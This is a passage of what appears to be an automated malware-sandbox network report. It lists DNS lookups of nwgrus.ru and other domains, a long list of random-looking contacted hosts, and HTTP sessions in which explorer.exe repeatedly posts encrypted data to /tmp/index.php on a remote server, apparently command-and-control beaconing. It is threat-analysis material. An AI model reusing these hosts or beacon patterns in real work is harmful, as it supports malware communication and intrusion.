Oct 4, 2024 19:20:56.917818069 CEST	53	64457	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:56.917860031 CEST	53	64457	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 19:17:27.700813055 CEST	192.168.2.4	1.1.1.1	0x6995	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:28.741741896 CEST	192.168.2.4	1.1.1.1	0x6995	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.742078066 CEST	192.168.2.4	1.1.1.1	0x6995	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:13.850114107 CEST	192.168.2.4	1.1.1.1	0x2a71	Standard query (0)	codeberg.org	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:32.498121023 CEST	192.168.2.4	1.1.1.1	0xe056	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:33.515808105 CEST	192.168.2.4	1.1.1.1	0xe056	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:33.566003084 CEST	192.168.2.4	1.1.1.1	0xb7ce	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:34.570085049 CEST	192.168.2.4	1.1.1.1	0xb7ce	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:44.162974119 CEST	192.168.2.4	1.1.1.1	0x3012	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:45.190474033 CEST	192.168.2.4	1.1.1.1	0x3012	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:45.641482115 CEST	192.168.2.4	1.1.1.1	0x2969	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:46.656568050 CEST	192.168.2.4	1.1.1.1	0x2969	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:56.829653025 CEST	192.168.2.4	1.1.1.1	0x96ae	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:57.830749035 CEST	192.168.2.4	1.1.1.1	0x96ae	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:57.950525999 CEST	192.168.2.4	1.1.1.1	0x8d76	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:10.465905905 CEST	192.168.2.4	1.1.1.1	0x58f9	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:10.645824909 CEST	192.168.2.4	1.1.1.1	0xa7	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:11.461026907 CEST	192.168.2.4	1.1.1.1	0x58f9	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:11.632920980 CEST	192.168.2.4	1.1.1.1	0xa7	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.034105062 CEST	192.168.2.4	1.1.1.1	0x4840	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.648463011 CEST	192.168.2.4	1.1.1.1	0xa7	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:24.607144117 CEST	192.168.2.4	1.1.1.1	0xbc93	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:25.162956953 CEST	192.168.2.4	1.1.1.1	0xe458	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:26.175026894 CEST	192.168.2.4	1.1.1.1	0xe458	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:39.959743977 CEST	192.168.2.4	1.1.1.1	0xf42b	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:40.002228022 CEST	192.168.2.4	1.1.1.1	0xae14	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:54.569093943 CEST	192.168.2.4	1.1.1.1	0xc023	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:55.577992916 CEST	192.168.2.4	1.1.1.1	0xc023	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:55.642632008 CEST	192.168.2.4	1.1.1.1	0xf725	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:56.644588947 CEST	192.168.2.4	1.1.1.1	0xf725	Standard query (0)	bestworldhools.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890300989 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		189.143.207.58	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890316010 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		189.143.207.58	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:17:29.890326023 CEST	1.1.1.1	192.168.2.4	0x6995	No error (0)	nwgrus.ru		189.143.207.58	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:13.858931065 CEST	1.1.1.1	192.168.2.4	0x2a71	No error (0)	codeberg.org		217.197.91.145	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:33.557799101 CEST	1.1.1.1	192.168.2.4	0xe056	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:33.558357954 CEST	1.1.1.1	192.168.2.4	0xe056	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:34.734561920 CEST	1.1.1.1	192.168.2.4	0xb7ce	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:18:34.734599113 CEST	1.1.1.1	192.168.2.4	0xb7ce	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:45.620026112 CEST	1.1.1.1	192.168.2.4	0x3012	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:45.620125055 CEST	1.1.1.1	192.168.2.4	0x3012	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:46.745006084 CEST	1.1.1.1	192.168.2.4	0x2969	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:46.745026112 CEST	1.1.1.1	192.168.2.4	0x2969	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:57.915266991 CEST	1.1.1.1	192.168.2.4	0x96ae	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:57.916254044 CEST	1.1.1.1	192.168.2.4	0x96ae	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:19:58.484646082 CEST	1.1.1.1	192.168.2.4	0x8d76	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:11.881942987 CEST	1.1.1.1	192.168.2.4	0x58f9	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:11.881966114 CEST	1.1.1.1	192.168.2.4	0x58f9	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		189.143.207.58	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838850975 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		189.143.207.58	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838876009 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		189.143.207.58	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.838891029 CEST	1.1.1.1	192.168.2.4	0xa7	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:12.967906952 CEST	1.1.1.1	192.168.2.4	0x4840	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:25.121330023 CEST	1.1.1.1	192.168.2.4	0xbc93	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:26.754235983 CEST	1.1.1.1	192.168.2.4	0xe458	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:26.757999897 CEST	1.1.1.1	192.168.2.4	0xe458	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:39.974594116 CEST	1.1.1.1	192.168.2.4	0xf42b	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:40.950891972 CEST	1.1.1.1	192.168.2.4	0xae14	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:55.620475054 CEST	1.1.1.1	192.168.2.4	0xc023	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:55.620501041 CEST	1.1.1.1	192.168.2.4	0xc023	Name error (3)	calvinandhalls.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:56.917818069 CEST	1.1.1.1	192.168.2.4	0xf725	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false
Oct 4, 2024 19:20:56.917860031 CEST	1.1.1.1	192.168.2.4	0xf725	Name error (3)	bestworldhools.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

codeberg.org

ymfsjxxjefdfso.com

nwgrus.ru

gaaiqehpdrl.com

nsyybqctivusmhf.net

gyhesrqsslpwya.com

adcijuuyqpoytbg.com

ynyhgoxksqcqux.org

efqngojwjwmo.net

slcfgcsbfxfboq.com

soxhctcejph.net

unecmrmecypjdcds.net

rsqwlptdbkicnj.net

qfsgibodkcmgjnhs.net

iypyxugbhpjfu.org

wckgnkwavbhg.org

bsjhlaqplgxee.net

msepyhqdoiyw.com

ubqbmapskssunnlw.com

qfqulohrbnuwl.org

ishmldllgtoat.com

pgccgnhrnlclx.org

aavvgkbncxkwcma.org

ldwiwwwcudjue.net

msydcfqytkyly.org

ynkhngybxmld.net

iwomylugxujp.org

vqlmgxiqipmlfda.org

mhabccdcfgoeshi.com

qhqjabyurfswwyf.org

jfivjaggias.net

oecmcnbulbfndgqw.com

tpydbdrotfs.net

qrkdkbqfwfclqg.org

owadrehnugjdh.org

wyvokdhlnlrsvuh.net

daglechfqxgadh.net

lshvsjxacvhbre.com

nweaheqhdcfapi.net

jwpopyrbbpjc.com

syllqtgnchytfjbx.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:29.901056051 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ymfsjxxjefdfso.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 235 Host: nwgrus.ru
Oct 4, 2024 19:17:29.901079893 CEST	235	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 2d e0 a0 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vus-UeiPqDAnj>v&qY:7d>(zyB91'}%\;#E5x663Nrcyb\RN
Oct 4, 2024 19:17:31.162223101 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:31.219259024 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gaaiqehpdrl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: nwgrus.ru
Oct 4, 2024 19:17:31.219259024 CEST	197	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7e 01 fd 93 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu~_Nj\|Nc?1feUs\ujq0IERhWRIsBa)~u9l
Oct 4, 2024 19:17:32.743103981 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:32.751941919 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsyybqctivusmhf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: nwgrus.ru
Oct 4, 2024 19:17:32.751979113 CEST	275	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 7f 23 bf 9e Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu#UeEL~WJ(Qq67bBrSS9Y"~TXovJ&_:{ghq69c4gV]tANkgkoTe
Oct 4, 2024 19:17:34.012309074 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:34.024044991 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gyhesrqsslpwya.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: nwgrus.ru
